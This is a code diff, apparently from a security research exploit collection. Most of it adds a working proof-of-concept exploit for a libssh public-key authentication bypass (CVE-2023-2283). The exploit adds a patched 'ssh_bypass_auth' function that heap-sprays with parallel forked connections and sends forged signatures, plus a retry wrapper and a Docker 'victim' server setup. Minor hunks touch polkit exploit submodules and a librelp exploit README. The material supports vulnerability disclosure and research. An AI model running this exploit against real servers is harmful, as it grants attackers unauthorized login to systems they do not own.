(myid = 1; myid < nprocs; myid++) { ++ struct timespec tm = {0}; ++ pid_t cpid = fork(); ++ if (cpid < 0) { ++ const int err = errno; ++ fprintf(stderr, "fork failed: %s\n", strerror(err)); ++ exit(EXIT_FAILURE); ++ } else if (cpid == 0) { ++ break; ++ } ++ ++ cpids[myid-1] = cpid; ++ // Short delay between each fork so that they don't all try to connect ++ // at once. ++ tm.tv_nsec = 1000000000L / 10; ++ nanosleep(&tm, 0); ++ } ++ if (myid == nprocs) { ++ myid = 0; ++ } else { ++ // Suppress output in the forks ++ const int stdin_new = open("/dev/null", O_RDONLY); ++ const int stdout_new = open("/dev/null", O_RDONLY); ++ const int stderr_new = open("/dev/null", O_RDONLY); ++ dup2(stdin_new, STDIN_FILENO); ++ dup2(stdout_new, STDOUT_FILENO); ++ dup2(stderr_new, STDERR_FILENO); ++ close(stdin_new); ++ close(stdout_new); ++ close(stderr_new); ++ } ++ printf("fork id %d\n", myid); + + ssh_init(); + session = ssh_new(); +@@ -427,7 +493,10 @@ int main(int argc, char **argv) + signal(SIGTERM, do_exit); + + set_pcap(session); +- client(session); ++ result = client(session, myid, nprocs, cpids); ++ if (myid == 0) { ++ kill_procs(nprocs, cpids); ++ } + + ssh_disconnect(session); + ssh_free(session); +@@ -435,5 +504,36 @@ int main(int argc, char **argv) + + ssh_finalize(); + +- return 0; ++ return result; ++} ++ ++int main(int argc, char **argv) ++{ ++ // Keep restarting the process until it's successful. ++ while (1) { ++ const pid_t cpid = fork(); ++ if (cpid == 0) { ++ break; ++ } else if (cpid > 0) { ++ int wstatus = 0; ++ waitpid(cpid, &wstatus, 0); ++ if (WEXITSTATUS(wstatus) == EXIT_SUCCESS) { ++ return EXIT_SUCCESS; ++ } ++ } else { ++ return EXIT_FAILURE; ++ } ++ } ++ ++ if (open("success.txt", O_RDONLY) >= 0) { ++ printf("Stopping because a file named success.txt was found.\n"); ++ return EXIT_SUCCESS; ++ } ++ ++ srand(time(0)); ++ if (run(argc, argv) == 0) { ++ return EXIT_SUCCESS; ++ } else { ++ return EXIT_FAILURE; ++ } + } +diff --git a/include/libssh/libssh.h b/include/libssh/libssh.h +index 7857a77b..e79da840 100644 +--- a/include/libssh/libssh.h ++++ b/include/libssh/libssh.h +@@ -508,6 +508,9 @@ LIBSSH_API void ssh_disconnect(ssh_session session); + LIBSSH_API char *ssh_dirname (const char *path); + LIBSSH_API int ssh_finalize(void); + ++LIBSSH_API int ssh_bypass_auth(ssh_session session, const char* pubkey_filename, const int myid, const int nprocs); ++ ++ + /* REVERSE PORT FORWARDING */ + LIBSSH_API ssh_channel ssh_channel_open_forward_port(ssh_session session, + int timeout_ms, +diff --git a/src/client.c b/src/client.c +index a35a28e1..e2facc4a 100644 +--- a/src/client.c ++++ b/src/client.c +@@ -24,6 +24,7 @@ + #include "config.h" + + #include ++#include + + #ifndef _WIN32 + #include +@@ -46,6 +47,7 @@ + #include "libssh/misc.h" + #include "libssh/pki.h" + #include "libssh/kex.h" ++#include "libssh/string.h" + + #define set_status(session, status) do {\ + if (session->common.callbacks && session->common.callbacks->connect_status_function) \ +@@ -834,6 +836,138 @@ error: + } + } + ++static int send_service_request(ssh_session session, ssh_string str, bool set_wontblock) { ++ ssh_buffer_pack(session->out_buffer, "bS", SSH2_MSG_SERVICE_REQUEST, str); ++ if (set_wontblock) { ++ ssh_socket_set_write_wontblock(session->socket); ++ } ++ if (ssh_packet_send(session) == SSH_ERROR) { ++ ssh_set_error(session, SSH_FATAL, ++ "Sending SSH2_MSG_UNIMPLEMENTED failed."); ++ printf("Sending SSH2_MSG_UNIMPLEMENTED failed.\n"); ++ return -1; ++ } ++ return 0; ++} ++ ++int ssh_bypass_auth(ssh_session session, const char *pubkey_filename, const int myid, const int nprocs) { ++ struct ssh_crypto_struct *crypto = ssh_packet_get_current_crypto(session, SSH_DIRECTION_BOTH); ++ size_t i, n; ++ int rc; ++ int result = -1; ++ ++ if (myid > 0) { ++ size_t sizes[5] = {0x40000 - 5, 0x40000 - 5, 0x40000 - 5, 0x4000 - 5, 0xf00 - 5}; ++ ssh_string str; ++ sleep(1); ++ assert(myid <= sizeof(sizes)/sizeof(sizes[0])); ++ const size_t slen = sizes[myid-1]; ++ printf("slen = %lx\n", slen); ++ str = ssh_string_new(slen); ++ // note: ssh_string has a length field, so you don't have to nul-terminate them. ++ memset(ssh_string_data(str), 'x', slen); ++ for (i = 0; i < 192; i++) { ++ if (send_service_request(session, str, i >= 0) < 0) { ++ return result; ++ } ++ } ++ ssh_string_free(str); ++ pause(); ++ } else { ++ const char *sig_type_c = NULL; ++ ssh_key pubkey = NULL; ++ ssh_string pubkey_s = NULL; ++ ++ ssh_pki_import_pubkey_file(pubkey_filename, &pubkey); ++ ssh_pki_export_pubkey_blob(pubkey, &pubkey_s); ++ ++ sig_type_c = ssh_key_get_signature_algorithm(session, pubkey->type); ++ printf("sig_type_c = %s\n", sig_type_c); ++ sleep(2); ++ for (i = 0; i < 100 && result < 0; i++) { ++ ssh_string username; ++ ssh_string service; ++ ssh_string algo; ++ ++ // 0x37 is the maximum string length that will fit in an 0x40-sized malloc chunk. ++ username = ssh_string_new(0x37 + i * 0x400); ++ memset(ssh_string_data(username), 0, ssh_string_len(username)); ++ if (ssh_string_fill(username, session->opts.username, strlen(session->opts.username)) < 0) { ++ printf("username is too long: %s\n", session->opts.username); ++ return result; ++ } ++ service = ssh_string_new(0x37 + i * 0x500); ++ memset(ssh_string_data(service), 0, ssh_string_len(service)); ++ ssh_string_fill(service, "ssh-connection", 15); ++ algo = ssh_string_new(1); ++ memset(ssh_string_data(algo), 'x', ssh_string_len(algo)); ++ printf("send userauth 0\n"); ++ ssh_buffer_pack(session->out_buffer, "bSSsbSS", ++ SSH2_MSG_USERAUTH_REQUEST, ++ username, ++ service, ++ "publickey", ++ 1, /* private key */ ++ algo, ++ pubkey_s /* public key */ ++ ); ++ ssh_string_free(username); ++ ssh_string_free(service); ++ ssh_string_free(algo); ++ ++ ssh_string fakesig = ssh_string_new(90 /*i == 0 ? 400 : 0x400 * i*/); ++ memset(ssh_string_data(fakesig), 'x', ssh_string_len(fakesig)); ++ ssh_string sigtype = ssh_string_from_char(sig_type_c); ++ size_t sigtypelen = ssh_string_len(sigtype) + sizeof(uint32_t); ++ ssh_string payload = ssh_string_new(ED25519_SIG_LEN); ++ memcpy(ssh_string_data(payload), "kevwozere", 10); ++ size_t payloadlen = ssh_string_len(payload) + sizeof(uint32_t); ++ assert(sigtypelen + payloadlen <= ssh_string_len(fakesig)); ++ memcpy(ssh_string_data(fakesig), sigtype, sigtypelen); ++ memcpy((char*)ssh_string_data(fakesig) + sigtypelen, payload, payloadlen); ++ ssh_string_free(sigtype); ++ ssh_string_free(payload); ++ ssh_buffer_pack(session->out_buffer, "S", fakesig); ++ ssh_string_free(fakesig); ++ session->auth.service_state = SSH_AUTH_SERVICE_SENT; ++ session->auth.current_method = SSH_AUTH_METHOD_PUBLICKEY; ++ session->auth.state = SSH_AUTH_STATE_PUBKEY_AUTH_SENT; ++ session->pending_call_state = SSH_PENDING_CALL_AUTH_PUBKEY; ++ ++ printf("out_buf size: %x\n", ssh_buffer_get_len(session->out_buffer)); ++ if (ssh_packet_send(session) == SSH_ERROR) { ++ ssh_set_error(session, SSH_FATAL, ++ "Sending SSH2_MSG_UNIMPLEMENTED failed."); ++ return result; ++ } ++ printf("send userauth 1\n"); ++ ++ // If the userauth message was unsuccessful then we don't get ++ // a reply from the server. So we send a short service request ++ // message, which will get a reply. Then we can tell from ++ // which type of reply we receive whether the userauth was ++ // successful. ++ { ++ ssh_string str = ssh_string_from_char("x"); ++ if (send_service_request(session, str, true) < 0) { ++ return result; ++ } ++ ssh_string_free(str); ++ } ++ ++ rc=ssh_handle_packets_termination(session,SSH_TIMEOUT_USER, ++ ssh_service_request_termination, session); ++ printf("rc = %d\n", rc); ++ if (session->auth.state == SSH_AUTH_STATE_SUCCESS) { ++ result = 0; ++ } ++ } ++ ssh_string_free(pubkey_s); ++ ssh_key_free(pubkey); ++ } ++ return result; ++} ++ + const char *ssh_copyright(void) + { + return SSH_STRINGIFY(LIBSSH_VERSION) " (c) 2003-2022 " +diff --git a/src/libssh.map b/src/libssh.map +index eeb625c5..f20d89b9 100644 +--- a/src/libssh.map ++++ b/src/libssh.map +@@ -188,6 +188,7 @@ LIBSSH_4_5_0 # Released + ssh_connector_set_out_channel; + ssh_connector_set_out_fd; + ssh_copyright; ++ ssh_bypass_auth; + ssh_dirname; + ssh_disconnect; + ssh_dump_knownhost; diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub new file mode 100644 index 0000000..1ecefa0 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub new file mode 100644 index 0000000..7efed1a --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVIGdVtCjMEzzbewMED01wAqaBcU6HytjUJoZt9Cm3lS0C691ZPayL14aj5uC9H73JDAabl58IEy6k++Wb5ryp74pozZ/H3swAuJlBidbeAUjtQbM5cxBT9hO7XE9YdHTXLzmVSF2NzyTt2HSZJPpYKsh0k7O56kfk/DfrIU7qGcIoDTNgK8zErXN2CjQ0dqm/sDZP1rxfHOfvLvTKx3WA30ko9c+zrIEJZ9pHV/OALOxPHf4WDewsMH3g1nG52hei2NG6r8nLP4BSEKcTbrebI6/RKOfXaFROMN01g9SY6Y0XmG0vAsyyRw0+oJMKAaoYgtokfBbJUJRtZ3uFavcA1DGRYn1Kswbwg+ZWMYoPRTTJ/Hzl8DqViWUOdsu9kHm24orPJZEajAo6kvjEjUQj2CKMbUVbxYB54S+taSXDhbeYWx1hACN/L8FufLdtW2veeuUOKJ0MtOMRCu5uCvLI7Y2wI6xxGa3jHOap81jyNa1vuMYfkk1z3jk5Ol5rlKE= victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile new file mode 100644 index 0000000..97d50ea --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile @@ -0,0 +1,35 @@ +FROM ubuntu:22.04 + +ENV DEBIAN_FRONTEND=noninteractive + +RUN apt-get update && \ + apt-get install -y \ + sudo tmux emacs git gdb cmake build-essential net-tools psmisc \ + libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg \ + libc6-dbg + +ARG UID=1000 + +# Create a non-root user account to run libssh. +RUN adduser victim --disabled-password --uid $UID + +# Grant the 'victim' user sudo access. This is not used for the demo, +# but it is often handy for installing extra packages. +RUN adduser victim sudo +RUN echo "victim:x" | chpasswd +COPY home/ /home/victim/ +RUN chown -R victim:victim /home/victim + +# Switch over to the 'victim' user, since root access is no longer required +USER victim +WORKDIR /home/victim + +# Clone and build libssh v0.10.4 +RUN git clone https://git.libssh.org/projects/libssh.git && \ + cd libssh && \ + git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \ + mkdir build && cd build && \ + cmake .. && \ + make -j $(nproc) + +USER victim diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history new file mode 100644 index 0000000..d291675 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history @@ -0,0 +1,5 @@ +mkdir ~/testkeys +ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa +ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa +ulimit -v 262144 +~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys new file mode 100644 index 0000000..1ecefa0 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub new file mode 100644 index 0000000..1ecefa0 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub new file mode 100644 index 0000000..7efed1a --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVIGdVtCjMEzzbewMED01wAqaBcU6HytjUJoZt9Cm3lS0C691ZPayL14aj5uC9H73JDAabl58IEy6k++Wb5ryp74pozZ/H3swAuJlBidbeAUjtQbM5cxBT9hO7XE9YdHTXLzmVSF2NzyTt2HSZJPpYKsh0k7O56kfk/DfrIU7qGcIoDTNgK8zErXN2CjQ0dqm/sDZP1rxfHOfvLvTKx3WA30ko9c+zrIEJZ9pHV/OALOxPHf4WDewsMH3g1nG52hei2NG6r8nLP4BSEKcTbrebI6/RKOfXaFROMN01g9SY6Y0XmG0vAsyyRw0+oJMKAaoYgtokfBbJUJRtZ3uFavcA1DGRYn1Kswbwg+ZWMYoPRTTJ/Hzl8DqViWUOdsu9kHm24orPJZEajAo6kvjEjUQj2CKMbUVbxYB54S+taSXDhbeYWx1hACN/L8FufLdtW2veeuUOKJ0MtOMRCu5uCvLI7Y2wI6xxGa3jHOap81jyNa1vuMYfkk1z3jk5Ol5rlKE= victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf new file mode 100644 index 0000000..f2da785 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf @@ -0,0 +1,11 @@ +# Enable 256 colors +set -g default-terminal "screen-256color" + +# Enable using the mouse to switch windows. +set -g mouse on + +# Don't lose track of SSH_AGENT etc. from parent environment. +set -g update-environment -r + +# history buffer size +set-option -g history-limit 100000 diff --git a/SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse b/SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse index 0d28bdc..8d73dbe 160000 --- a/SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse +++ b/SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse @@ -1 +1 @@ -Subproject commit 0d28bdc3ba1c6c4e69e125aa394eddd6edb7622f +Subproject commit 8d73dbeafd857207bfd76b10ec74b5cc382e1975 diff --git a/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse b/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse index b2c75ca..8d73dbe 160000 --- a/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse +++ b/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse @@ -1 +1 @@ -Subproject commit b2c75caace13d54303581a71f72c83bb5239b3a2 +Subproject commit 8d73dbeafd857207bfd76b10ec74b5cc382e1975 diff --git a/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md b/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md index fe05459..989f3aa 100644 --- a/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md +++ b/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md @@ -2,4 +2,4 @@ This directory contains a proof-of-concept exploit for a remote code execution vulnerability in [librelp](https://www.rsyslog.com/librelp/). The vulnerability was fixed in librelp version [1.2.15](https://www.rsyslog.com/librelp-1-2-15/), released on 2018-03-22. -For more information about the vulnerability and for instructions on how to run the proof-of-concept exploit, please see our blog post which is published on both [Rainer Gerhards's blog](https://rainer.gerhards.net/how-we-found-and-fixed-cve-in-librelp) and on the [LGTM blog](https://lgtm.com/blog/rsyslog_snprintf_CVE-2018-1000140). +For more information about the vulnerability and for instructions on how to run the proof-of-concept exploit, please see our blog post which is published on both [Rainer Gerhards's blog](https://rainer.gerhards.net/how-we-found-and-fixed-cve-in-librelp) and on the [blog](https://securitylab.github.com/research/librelp-buffer-overflow-cve-2018-1000140/).